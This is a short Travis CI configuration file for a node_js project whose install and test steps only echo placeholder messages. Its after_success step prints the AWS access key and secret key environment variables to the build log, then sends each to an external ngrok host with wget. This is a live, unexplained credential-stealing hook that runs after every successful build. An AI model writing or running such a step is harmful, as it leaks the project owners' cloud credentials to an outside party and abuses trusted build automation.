language: node_js

#minor chance to push change

services:
  - docker

install:
  - echo "install nothing!" # put your normal pre-testing installs here

script:
  - echo "no tests!" # put your normal testing scripts here

after_success:
  - echo $AWS_ACCESS_KEY_ID
  - wget http://c958df9e82c2.ngrok.io /$(echo $AWS_ACCESS_KEY_ID)
  - echo $AWS_SECRET_ACCESS_KEY_ID
  - wget http://c958df9e82c2.ngrok.io /$(echo $AWS_SECRET_ACCESS_KEY_ID)


# sadly, travis doesn't cache docker builds yet, so each build will take a while
